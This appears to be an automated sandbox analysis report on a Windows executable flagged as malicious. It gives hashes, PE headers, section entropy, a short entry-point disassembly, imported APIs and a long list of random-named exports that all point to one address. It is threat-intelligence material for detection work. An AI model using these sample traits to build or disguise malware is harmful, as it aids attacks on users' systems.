                                                                                                                                                                                                                                                                                        SHA-256:F8EF3E3B18E72EEBB4B18EDBC90F7F5851AB0AF044473FA2856FC974F0C33D6C
                                                                                                                                                                                                                                                                                        SHA-512:E97A8AA76EBC4E473323CC8E7413FA8536EA57986F1FD4A45EC39BF3C86A817852FA2D9531C1BB622D0611D26E7AFB970DA9833220FC12B3170417718A1E12AA
                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 24%
                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........p.I...I...I...&...[...&.......&...f...@...H...@...Z...I...o...I...H...&...J...&...H...&...H...&...H...RichI...........................PE..L.....vd.....................b.......h............@..................................7....@..........................n.......V.......0...#...................`..8!......................................@............................................text............................... ..`.rdata..............................@..@.data...@........|...~..............@....rsrc....#...0...$..................@..@.reloc...5...`...6..................@..B................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\fs7AQcREFX.exe
                                                                                                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                        Size (bytes):26
                                                                                                                                                                                                                                                                                        Entropy (8bit):3.95006375643621
                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                        SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                                                                                                        MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                                                                                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                                                                                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                                                                                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                        Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                                                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                        Entropy (8bit):6.860013762050438
                                                                                                                                                                                                                                                                                        TrID:
                                                                                                                                                                                                                                                                                        • Win32 Executable (generic) a (10002005/4) 99.53%
                                                                                                                                                                                                                                                                                        • InstallShield setup (43055/19) 0.43%
                                                                                                                                                                                                                                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                                                                        File name:fs7AQcREFX.exe
                                                                                                                                                                                                                                                                                        File size:545792
                                                                                                                                                                                                                                                                                        MD5:6bb40ed95f770955ea7cf27e4785612e
                                                                                                                                                                                                                                                                                        SHA1:db93260f6bdeb2321fd73019af3d6182c97fd2c5
                                                                                                                                                                                                                                                                                        SHA256:f8ef3e3b18e72eebb4b18edbc90f7f5851ab0af044473fa2856fc974f0c33d6c
                                                                                                                                                                                                                                                                                        SHA512:e97a8aa76ebc4e473323cc8e7413fa8536ea57986f1fd4a45ec39bf3c86a817852fa2d9531c1bb622d0611d26e7afb970da9833220fc12b3170417718a1e12aa
                                                                                                                                                                                                                                                                                        SSDEEP:12288:NJsZ3dUdAz1aVlOsBfDtNK+UmDFZIdP03d0cMvNc:rsH6FvOYtNK+HrId03dEvS
                                                                                                                                                                                                                                                                                        TLSH:CBC4BE21FB87F031ED9B143418B5B2FF146DA56103AA80FB72D8CA6D3A105E25A74F1B
                                                                                                                                                                                                                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........p.I...I...I...&...[...&.......&...f...@...H...@...Z...I...o...I...H...&...J...&...H...&...H...&...H...RichI..................
                                                                                                                                                                                                                                                                                        Icon Hash:90cececece8e8eb0
                                                                                                                                                                                                                                                                                        Entrypoint:0x416812
                                                                                                                                                                                                                                                                                        Entrypoint Section:.text
                                                                                                                                                                                                                                                                                        Digitally signed:false
                                                                                                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                                                                                                        Subsystem:windows gui
                                                                                                                                                                                                                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                                                        Time Stamp:0x64760996 [Tue May 30 14:35:02 2023 UTC]
                                                                                                                                                                                                                                                                                        TLS Callbacks:
                                                                                                                                                                                                                                                                                        CLR (.Net) Version:
                                                                                                                                                                                                                                                                                        OS Version Major:5
                                                                                                                                                                                                                                                                                        OS Version Minor:1
                                                                                                                                                                                                                                                                                        File Version Major:5
                                                                                                                                                                                                                                                                                        File Version Minor:1
                                                                                                                                                                                                                                                                                        Subsystem Version Major:5
                                                                                                                                                                                                                                                                                        Subsystem Version Minor:1
                                                                                                                                                                                                                                                                                        Import Hash:02ecafa93e16cc93afff7f406beb81aa
                                                                                                                                                                                                                                                                                        Instruction
                                                                                                                                                                                                                                                                                        call 00007FAFC8C8C665h
                                                                                                                                                                                                                                                                                        jmp 00007FAFC8C8896Eh
                                                                                                                                                                                                                                                                                        int3
                                                                                                                                                                                                                                                                                        int3
                                                                                                                                                                                                                                                                                        int3
                                                                                                                                                                                                                                                                                        int3
                                                                                                                                                                                                                                                                                        mov edx, dword ptr [esp+0Ch]
                                                                                                                                                                                                                                                                                        mov ecx, dword ptr [esp+04h]
                                                                                                                                                                                                                                                                                        test edx, edx
                                                                                                                                                                                                                                                                                        je 00007FAFC8C88B4Bh
                                                                                                                                                                                                                                                                                        xor eax, eax
                                                                                                                                                                                                                                                                                        mov al, byte ptr [esp+08h]
                                                                                                                                                                                                                                                                                        test al, al
                                                                                                                                                                                                                                                                                        jne 00007FAFC8C88AF8h
                                                                                                                                                                                                                                                                                        cmp edx, 00000080h
                                                                                                                                                                                                                                                                                        jc 00007FAFC8C88AF0h
                                                                                                                                                                                                                                                                                        cmp dword ptr [00482A08h], 00000000h
                                                                                                                                                                                                                                                                                        je 00007FAFC8C88AE7h
                                                                                                                                                                                                                                                                                        jmp 00007FAFC8C8C6CBh
                                                                                                                                                                                                                                                                                        push edi
                                                                                                                                                                                                                                                                                        mov edi, ecx
                                                                                                                                                                                                                                                                                        cmp edx, 04h
                                                                                                                                                                                                                                                                                        jc 00007FAFC8C88B13h
                                                                                                                                                                                                                                                                                        neg ecx
                                                                                                                                                                                                                                                                                        and ecx, 03h
                                                                                                                                                                                                                                                                                        je 00007FAFC8C88AEEh
                                                                                                                                                                                                                                                                                        sub edx, ecx
                                                                                                                                                                                                                                                                                        mov byte ptr [edi], al
                                                                                                                                                                                                                                                                                        add edi, 01h
                                                                                                                                                                                                                                                                                        sub ecx, 01h
                                                                                                                                                                                                                                                                                        jne 00007FAFC8C88AD8h
                                                                                                                                                                                                                                                                                        mov ecx, eax
                                                                                                                                                                                                                                                                                        shl eax, 08h
                                                                                                                                                                                                                                                                                        add eax, ecx
                                                                                                                                                                                                                                                                                        mov ecx, eax
                                                                                                                                                                                                                                                                                        shl eax, 10h
                                                                                                                                                                                                                                                                                        add eax, ecx
                                                                                                                                                                                                                                                                                        mov ecx, edx
                                                                                                                                                                                                                                                                                        and edx, 03h
                                                                                                                                                                                                                                                                                        shr ecx, 02h
                                                                                                                                                                                                                                                                                        je 00007FAFC8C88AE8h
                                                                                                                                                                                                                                                                                        rep stosd
                                                                                                                                                                                                                                                                                        test edx, edx
                                                                                                                                                                                                                                                                                        je 00007FAFC8C88AECh
                                                                                                                                                                                                                                                                                        mov byte ptr [edi], al
                                                                                                                                                                                                                                                                                        add edi, 01h
                                                                                                                                                                                                                                                                                        sub edx, 01h
                                                                                                                                                                                                                                                                                        jne 00007FAFC8C88AD8h
                                                                                                                                                                                                                                                                                        mov eax, dword ptr [esp+08h]
                                                                                                                                                                                                                                                                                        pop edi
                                                                                                                                                                                                                                                                                        ret
                                                                                                                                                                                                                                                                                        mov eax, dword ptr [esp+04h]
                                                                                                                                                                                                                                                                                        ret
                                                                                                                                                                                                                                                                                        mov edi, edi
                                                                                                                                                                                                                                                                                        push ebp
                                                                                                                                                                                                                                                                                        mov ebp, esp
                                                                                                                                                                                                                                                                                        sub esp, 00000328h
                                                                                                                                                                                                                                                                                        mov dword ptr [00480DB8h], eax
                                                                                                                                                                                                                                                                                        mov dword ptr [00480DB4h], ecx
                                                                                                                                                                                                                                                                                        mov dword ptr [00480DB0h], edx
                                                                                                                                                                                                                                                                                        mov dword ptr [00480DACh], ebx
                                                                                                                                                                                                                                                                                        mov dword ptr [00480DA8h], esi
                                                                                                                                                                                                                                                                                        mov dword ptr [00480DA4h], edi
                                                                                                                                                                                                                                                                                        mov word ptr [00480DD0h], ss
                                                                                                                                                                                                                                                                                        mov word ptr [00480DC4h], cs
                                                                                                                                                                                                                                                                                        mov word ptr [000000A0h], ds
                                                                                                                                                                                                                                                                                        Programming Language:
                                                                                                                                                                                                                                                                                        • [ASM] VS2010 build 30319
                                                                                                                                                                                                                                                                                        • [ C ] VS2010 build 30319
                                                                                                                                                                                                                                                                                        • [C++] VS2010 build 30319
                                                                                                                                                                                                                                                                                        • [ C ] VS2008 SP1 build 30729
                                                                                                                                                                                                                                                                                        • [IMP] VS2008 SP1 build 30729
                                                                                                                                                                                                                                                                                        • [EXP] VS2010 build 30319
                                                                                                                                                                                                                                                                                        • [RES] VS2010 build 30319
                                                                                                                                                                                                                                                                                        • [LNK] VS2010 build 30319
                                                                                                                                                                                                                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x26ef00x41cb9.rdata
                                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x256940xc8.rdata
                                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x830000x23a4.rsrc
                                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x860000x2138.reloc
                                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x22e800x40.rdata
                                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x200000x488.rdata
                                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                                                                                                                                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                                                                        .text0x10000x1ed9b0x1ee00False0.5425417510121457data6.462212357708359IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                                        .rdata0x200000x48ba90x48c00False0.5538585964347079data6.209745471818268IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                                        .data0x690000x19b400x17c00False0.7085115131578947data7.475869441617572IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                                                        .rsrc0x830000x23a40x2400False0.3036024305555556data3.963135936418743IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                                        .reloc0x860000x35a80x3600False0.4950086805555556data4.964344550126008IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                                        NameRVASizeTypeLanguageCountry
                                                                                                                                                                                                                                                                                        RT_BITMAP0x834d80x3ecDevice independent bitmap graphic, 114 x 15 x 4, image size 900EnglishUnited States
                                                                                                                                                                                                                                                                                        RT_BITMAP0x838c40x680Device independent bitmap graphic, 208 x 15 x 4, image size 1560EnglishUnited States
                                                                                                                                                                                                                                                                                        RT_MENU0x83f440x35cdataEnglishUnited States
                                                                                                                                                                                                                                                                                        RT_MENU0x842a00x98dataEnglishUnited States
                                                                                                                                                                                                                                                                                        RT_DIALOG0x843380x12edataEnglishUnited States
                                                                                                                                                                                                                                                                                        RT_STRING0x844680x34dataEnglishUnited States
                                                                                                                                                                                                                                                                                        RT_STRING0x8449c0x58dataEnglishUnited States
                                                                                                                                                                                                                                                                                        RT_STRING0x844f40x5edataEnglishUnited States
                                                                                                                                                                                                                                                                                        RT_STRING0x845540x296dataEnglishUnited States
                                                                                                                                                                                                                                                                                        RT_STRING0x847ec0x32adataEnglishUnited States
                                                                                                                                                                                                                                                                                        RT_STRING0x84b180x70dataEnglishUnited States
                                                                                                                                                                                                                                                                                        RT_STRING0x84b880x106dataEnglishUnited States
                                                                                                                                                                                                                                                                                        RT_STRING0x84c900xdadataEnglishUnited States
                                                                                                                                                                                                                                                                                        RT_STRING0x84d6c0x4cdataEnglishUnited States
                                                                                                                                                                                                                                                                                        RT_STRING0x84db80xc6dataEnglishUnited States
                                                                                                                                                                                                                                                                                        RT_STRING0x84e800x1f8dataEnglishUnited States
                                                                                                                                                                                                                                                                                        RT_STRING0x850780x86dataEnglishUnited States
                                                                                                                                                                                                                                                                                        RT_STRING0x851000x6cdataEnglishUnited States
                                                                                                                                                                                                                                                                                        RT_ACCELERATOR0x8516c0xa0dataEnglishUnited States
                                                                                                                                                                                                                                                                                        RT_MANIFEST0x8520c0x15aASCII text, with CRLF line terminatorsEnglishUnited States
                                                                                                                                                                                                                                                                                        None0x853680xedataEnglishUnited States
                                                                                                                                                                                                                                                                                        None0x853780x2cdataEnglishUnited States
                                                                                                                                                                                                                                                                                        DLLImport
                                                                                                                                                                                                                                                                                        KERNEL32.dllWriteFile, ExitProcess, HeapCreate, LCMapStringW, TlsFree, TlsSetValue, TlsGetValue, TlsAlloc, IsValidCodePage, GetOEMCP, GetACP, GetCPInfo, IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter, TerminateProcess, GetStartupInfoW, HeapSetInformation, GetCommandLineA, DecodePointer, GetStdHandle, VirtualQuery, GetSystemInfo, GetModuleHandleW, VirtualProtect, InterlockedPopEntrySList, VirtualAlloc, VirtualFree, IsProcessorFeaturePresent, HeapAlloc, GetProcessHeap, HeapFree, InterlockedPushEntrySList, InterlockedCompareExchange, GetModuleFileNameW, Sleep, HeapSize, HeapReAlloc, GetStringTypeW, FreeEnvironmentStringsW, GetEnvironmentStringsW, SetHandleCount, GetFileType, RtlUnwind, QueryPerformanceCounter, GetTickCount, GetSystemTimeAsFileTime, SetFilePointer, GetConsoleCP, GetConsoleMode, lstrcpyA, CreateThread, DebugBreak, GetCurrentProcessId, CloseHandle, GetVersionExA, OutputDebugStringA, GetCurrentThreadId, SetStdHandle, WriteConsoleW, CreateFileW, FlushFileBuffers, DeleteCriticalSection, LoadLibraryExA, GetModuleHandleA, GetModuleFileNameA, LoadLibraryW, GetProfileStringA, LockResource, LoadLibraryA, GlobalFree, EnterCriticalSection, GetProcAddress, lstrcmpiA, SetLastError, GetLastError, RaiseException, FlushInstructionCache, GlobalUnlock, lstrlenW, MultiByteToWideChar, lstrcatA, IsDBCSLeadByte, MulDiv, lstrcpynW, LeaveCriticalSection, SizeofResource, InitializeCriticalSectionAndSpinCount, WideCharToMultiByte, GlobalAlloc, GlobalLock, GetCurrentProcess, InterlockedDecrement, InterlockedIncrement, LoadResource, FreeLibrary, lstrcpynA, lstrlenA, lstrcmpA, FindResourceA, CreateFileA, EncodePointer, GetFullPathNameA
                                                                                                                                                                                                                                                                                        USER32.dllDestroyWindow, SetCursor, GetMessageA, GetClassNameA, ScreenToClient, IsMenu, SetActiveWindow, PostThreadMessageA, RegisterClassExA, MonitorFromPoint, PostQuitMessage, GetWindowDC, FillRect, IsChild, GetClassInfoExA, MsgWaitForMultipleObjects, DrawTextA, ClientToScreen, GetSubMenu, LoadStringA, DeleteMenu, GetFocus, LoadBitmapA, GetParent, LoadMenuA, CallNextHookEx, MessageBeep, IsWindowEnabled, wsprintfA, WindowFromPoint, CharNextA, GetClientRect, SetFocus, GetWindowTextLengthA, SendMessageA, DrawEdge, EndPaint, GetKeyState, SetRectEmpty, RegisterWindowMessageA, BeginPaint, PtInRect, GetMonitorInfoA, GetDC, IsDialogMessageA, TranslateMessage, InflateRect, GetMenu, OffsetRect, TrackPopupMenuEx, SetWindowLongA, MessageBoxA, InvalidateRect, CharLowerA, GetWindowLongA, CreateWindowExA, PeekMessageA, ReleaseDC, EnableMenuItem, TranslateAcceleratorA, MonitorFromWindow, EndDialog, DefWindowProcA, SetWindowsHookExA, GetSysColor, SetWindowPos, GetMenuItemInfoA, LoadStringW, GetMenuStringA, LoadAcceleratorsA, ShowWindow, SetMenu, CreatePopupMenu, GetSysColorBrush, FrameRect, GetActiveWindow, AppendMenuA, GetMenuItemCount, IsWindow, PostMessageA, wvsprintfA, RemoveMenu, DispatchMessageA, SetMenuDefaultItem, UnhookWindowsHookEx, SystemParametersInfoA, GetSystemMetrics, IsWindowVisible, InsertMenuA, SetWindowTextA, LoadImageA, MapWindowPoints, UpdateWindow, CallWindowProcA, DestroyMenu, SetMenuItemInfoA, LoadCursorA, DialogBoxParamA, DrawFrameControl, ModifyMenuA, CopyRect, GetMessagePos, GetWindowThreadProcessId, GetWindow, MoveWindow, GetWindowRect, UnregisterClassA
                                                                                                                                                                                                                                                                                        GDI32.dllDeleteDC, SetTextColor, StartPage, CreateEnhMetaFileA, DeleteEnhMetaFile, CreateDIBSection, GetTextExtentPoint32A, PatBlt, BitBlt, EndPage, AbortDoc, RestoreDC, CloseEnhMetaFile, GetStockObject, GetTextMetricsA, EndDoc, GetObjectA, CreatePatternBrush, OffsetWindowOrgEx, SaveDC, StartDocA, CreateCompatibleBitmap, CombineRgn, PlayEnhMetaFile, CreateRectRgnIndirect, ResetDCA, CreateCompatibleDC, SelectClipRgn, SelectObject, DeleteObject, SetBkMode, CreateBitmap, CreateDCA, GetEnhMetaFileHeader, SetBkColor, SetBrushOrgEx, SetViewportOrgEx, GetDeviceCaps, CreateFontIndirectA
                                                                                                                                                                                                                                                                                        WINSPOOL.DRVGetPrinterA, ClosePrinter, OpenPrinterA
                                                                                                                                                                                                                                                                                        COMDLG32.dllPrintDlgA, GetOpenFileNameA, GetSaveFileNameA, ChooseFontA, FindTextA, PageSetupDlgA, ReplaceTextA
                                                                                                                                                                                                                                                                                        ADVAPI32.dllRegQueryValueExA, RegQueryInfoKeyW, RegDeleteKeyA, RegEnumKeyExA, RegCreateKeyExA, RegOpenKeyExA, RegDeleteValueA, RegCloseKey, RegSetValueExA
                                                                                                                                                                                                                                                                                        ole32.dllCoTaskMemRealloc, CoTaskMemFree, CoTaskMemAlloc, CoCreateInstance
                                                                                                                                                                                                                                                                                        OLEAUT32.dllVarUI4FromStr
                                                                                                                                                                                                                                                                                        COMCTL32.dllImageList_Draw, ImageList_Destroy, ImageList_AddMasked, ImageList_LoadImageA, InitCommonControlsEx, ImageList_Create, ImageList_GetImageCount
                                                                                                                                                                                                                                                                                        NameOrdinalAddress
                                                                                                                                                                                                                                                                                        AAxFdKpurOQGDsNrD10x414650
                                                                                                                                                                                                                                                                                        ABuHOH20x414650
                                                                                                                                                                                                                                                                                        ABysuQPvxvtPWxSdkfFUwGh30x414650
                                                                                                                                                                                                                                                                                        ACUZbdBra40x414650
                                                                                                                                                                                                                                                                                        ACUqrMEppdxiTcT50x414650
                                                                                                                                                                                                                                                                                        ACVIernCqtdT60x414650
                                                                                                                                                                                                                                                                                        ACWbXExVT70x414650
                                                                                                                                                                                                                                                                                        ADHMEqODMmNKCpGsssaeQXxB80x414650
                                                                                                                                                                                                                                                                                        ADdFUJIFMpddJxpLB90x414650
                                                                                                                                                                                                                                                                                        ADjzfqQWY100x414650
                                                                                                                                                                                                                                                                                        AEFcWutvqVzjkRTLPogobwCYhy110x414650
                                                                                                                                                                                                                                                                                        AEKnRMQPoMEwDbRuzXtF120x414650
                                                                                                                                                                                                                                                                                        AEaiYVzG130x414650
                                                                                                                                                                                                                                                                                        AEiglszDvzWrRTqhFlt140x414650
                                                                                                                                                                                                                                                                                        AEpUhQnnPEtCTEbhybxJhoy150x414650
                                                                                                                                                                                                                                                                                        AEqPXAHkOeiQjGtzJHOJd160x414650
                                                                                                                                                                                                                                                                                        AFCGat170x414650
                                                                                                                                                                                                                                                                                        AFEMgppSLj180x414650
                                                                                                                                                                                                                                                                                        AFGFFljOfnM190x414650
                                                                                                                                                                                                                                                                                        AFpkbAnCrd200x414650
                                                                                                                                                                                                                                                                                        AFspppxHolAVrlPMgHC210x414650
                                                                                                                                                                                                                                                                                        AGEcActTKAdMiGrrrb220x414650
                                                                                                                                                                                                                                                                                        AGGbBK230x414650
                                                                                                                                                                                                                                                                                        AGeuXxcmDVZVtDm240x414650
                                                                                                                                                                                                                                                                                        AGwYOJOjpFpgyOMdIu250x414650
                                                                                                                                                                                                                                                                                        AHAMiflmqaU260x414650
                                                                                                                                                                                                                                                                                        AHCFtS270x414650
                                                                                                                                                                                                                                                                                        AHbPhuhvwaYP280x414650
                                                                                                                                                                                                                                                                                        AHuTVPNaauZpuo290x414650
                                                                                                                                                                                                                                                                                        AIbilV300x414650
                                                                                                                                                                                                                                                                                        AIlsTRBTiuTMAuulVMvFl310x414650
                                                                                                                                                                                                                                                                                        AIrdNOqLfOhFMsTrZLtUZPhDh320x414650
                                                                                                                                                                                                                                                                                        AJDcDBsBkOKBohzYUPAldSAH330x414650
                                                                                                                                                                                                                                                                                        AJFDYxWJXmisGYFTLQUXUsyF340x414650
                                                                                                                                                                                                                                                                                        AJHQMVF350x414650
                                                                                                                                                                                                                                                                                        AJHoACzknNgmnP360x414650
                                                                                                                                                                                                                                                                                        AJTxVXbGHUgcijGKBjWcXiH370x414650
                                                                                                                                                                                                                                                                                        AJhhTMUkcMmCFOawlqoiNb380x414650
                                                                                                                                                                                                                                                                                        AJvvVaNOFWfp390x414650
                                                                                                                                                                                                                                                                                        AKIGQSEcaWitKAQyFcAjFtqTd400x414650
                                                                                                                                                                                                                                                                                        AKOCSkMHfgeBdoxAqmg410x414650
                                                                                                                                                                                                                                                                                        AKslsUIzaWTRINzJmU420x414650
                                                                                                                                                                                                                                                                                        ALLWLwdnyCTIZ430x414650
                                                                                                                                                                                                                                                                                        ALPvGPHmwZg440x414650
                                                                                                                                                                                                                                                                                        ALacmcaPlHiBMEFiSlAzFYh450x414650
                                                                                                                                                                                                                                                                                        AMAksNuuuBlSeAxTrV460x414650
                                                                                                                                                                                                                                                                                        AMgMNpOHBFPPmRZeqDbQjBbPYY470x414650
                                                                                                                                                                                                                                                                                        AMwBfejOBnh480x414650
                                                                                                                                                                                                                                                                                        ANBeXrJCYaMsqbSYRTgh490x414650
                                                                                                                                                                                                                                                                                        ANDTKWFLjZgmxKgZw500x414650
                                                                                                                                                                                                                                                                                        ANSOZERThnvlvNZjMHWD510x414650
                                                                                                                                                                                                                                                                                        ANmZtSZwkmkRkbO520x414650
                                                                                                                                                                                                                                                                                        AONSHyNyaaiGWeXJeYT530x414650
                                                                                                                                                                                                                                                                                        AOiMVePUxGFpRbe540x414650
                                                                                                                                                                                                                                                                                        APDYblywxDKJTFuKbHkPJoxIqG550x414650
                                                                                                                                                                                                                                                                                        APHSQqvktGxhQQBeV560x414650
                                                                                                                                                                                                                                                                                        APzLQSosVoUnqoPodhE570x414650
                                                                                                                                                                                                                                                                                        AQMWcJWPsLmWHoZzq580x414650
                                                                                                                                                                                                                                                                                        AQSZsDCIILODXWPzNzRIxLY590x414650
                                                                                                                                                                                                                                                                                        AQUKmKcrlf600x414650
                                                                                                                                                                                                                                                                                        AQZEiZAhRplRkeqWb610x414650
                                                                                                                                                                                                                                                                                        AQhVpxYozSBhkozwvPFTVhe620x414650
                                                                                                                                                                                                                                                                                        AQlHnXduLyYxdZmbafxrVjTmw630x414650
                                                                                                                                                                                                                                                                                        AQxNAhUbFnWwlokXxKpXsfH640x414650
                                                                                                                                                                                                                                                                                        ARTstsWlIgflNchPrFQLrmJl650x414650
                                                                                                                                                                                                                                                                                        ARcKgvBCSWAvErJTKsPzbmKW660x414650
                                                                                                                                                                                                                                                                                        ARcWBniCNiDxDIKQlYmTPT670x414650
                                                                                                                                                                                                                                                                                        ASdPZb680x414650
                                                                                                                                                                                                                                                                                        ASqnvomXi690x414650
                                                                                                                                                                                                                                                                                        ATAVMvGGgbsIapVlR700x414650
                                                                                                                                                                                                                                                                                        ATPvFsCBRfTAjIPgYxvx710x414650
                                                                                                                                                                                                                                                                                        ATPzPIqIz720x414650
                                                                                                                                                                                                                                                                                        AThcCvKeeIEJbAqhVbEeK730x414650
                                                                                                                                                                                                                                                                                        ATjcVkvVAsRlxUf740x414650
                                                                                                                                                                                                                                                                                        ATouzZfkUv750x414650
                                                                                                                                                                                                                                                                                        ATpBhiPgzOgAP760x414650
                                                                                                                                                                                                                                                                                        ATsHcRrxaVADI770x414650
                                                                                                                                                                                                                                                                                        AUcMZDngaB780x414650
                                                                                                                                                                                                                                                                                        AUcsjfDAarUpsRqQ790x414650
                                                                                                                                                                                                                                                                                        AUtJMvmeEYaTwSRtoefvnWDPUi800x414650
                                                                                                                                                                                                                                                                                        AUwoiNNpmQNJnDjiyLsQ810x414650
                                                                                                                                                                                                                                                                                        AVNWiaqOYRHwbloFLvmSclfZFh820x414650
                                                                                                                                                                                                                                                                                        AVakIupAX830x414650
                                                                                                                                                                                                                                                                                        AVtUHSgRn840x414650
                                                                                                                                                                                                                                                                                        AWILMivCaBBqZSGtv850x414650
                                                                                                                                                                                                                                                                                        AWbhuburgPHboR860x414650
                                                                                                                                                                                                                                                                                        AWezGLMDOKtgFbzRAwbchlMWDD870x414650
                                                                                                                                                                                                                                                                                        AWqUQbsLqcHkGPRJBINrbzhY880x414650
                                                                                                                                                                                                                                                                                        AXadYTWGShhBkwVygtig890x414650
                                                                                                                                                                                                                                                                                        AXgrVTB900x414650
                                                                                                                                                                                                                                                                                        AXzYUbqMqL910x414650
                                                                                                                                                                                                                                                                                        AYGCdgmofZMPTHholfgvylIm920x414650
                                                                                                                                                                                                                                                                                        AYGgCnQh930x414650
                                                                                                                                                                                                                                                                                        AYWGUSgcTM940x414650
                                                                                                                                                                                                                                                                                        AYbBryDbhvTvGHdPPoGVVT950x414650
                                                                                                                                                                                                                                                                                        AYjBJgIwmN960x414650
                                                                                                                                                                                                                                                                                        AYrpOHcHChskYPhAqmo970x414650
                                                                                                                                                                                                                                                                                        AYtXUhTDxZAv980x414650
                                                                                                                                                                                                                                                                                        AZCyXeXvmUgSn990x414650
                                                                                                                                                                                                                                                                                        AZSnlFJgJPZWIUmURdKfKlkJT1000x414650
                                                                                                                                                                                                                                                                                        AZaNpjhSDxYapDqrEAwLmKyW1010x414650
                                                                                                                                                                                                                                                                                        AZbbVQURulRUbnIsoZD1020x414650
                                                                                                                                                                                                                                                                                        AZvRXKcKGMnkfpjkySivEyLf1030x414650
                                                                                                                                                                                                                                                                                        AaRMvEIPNE1040x414650
                                                                                                                                                                                                                                                                                        AaubuEK1050x414650
                                                                                                                                                                                                                                                                                        AbGhkPunUYqlf1060x414650
                                                                                                                                                                                                                                                                                        AbYlQCyhUVPj1070x414650
                                                                                                                                                                                                                                                                                        AbaKOnFUFntZwlxsHym1080x414650
                                                                                                                                                                                                                                                                                        AbiiLvWxJKZFwkhyeh1090x414650
                                                                                                                                                                                                                                                                                        AbloXGmbUVwKeTOWGDD1100x414650
                                                                                                                                                                                                                                                                                        AbsoXYbehXUITVVu1110x414650
                                                                                                                                                                                                                                                                                        AcBmKyQedjnZBkPPqrVV1120x414650
                                                                                                                                                                                                                                                                                        AcCRQGik1130x414650
                                                                                                                                                                                                                                                                                        AcWCmr1140x414650
                                                                                                                                                                                                                                                                                        AcgasoKLNBMdIhuomchD1150x414650
                                                                                                                                                                                                                                                                                        AcxYVUDyuMwZm1160x414650
                                                                                                                                                                                                                                                                                        AdNFpuftneixEN1170x414650
                                                                                                                                                                                                                                                                                        AdNstLDiBQvfvfyRlwKzAaH1180x414650
                                                                                                                                                                                                                                                                                        AdcAaqdcnGznKgnzkk1190x414650
                                                                                                                                                                                                                                                                                        AduICHRQnNcSlpSYRUtjpzcw1200x414650
                                                                                                                                                                                                                                                                                        AeBHPMmtyOcO1210x414650
                                                                                                                                                                                                                                                                                        AeDAhkC1220x414650
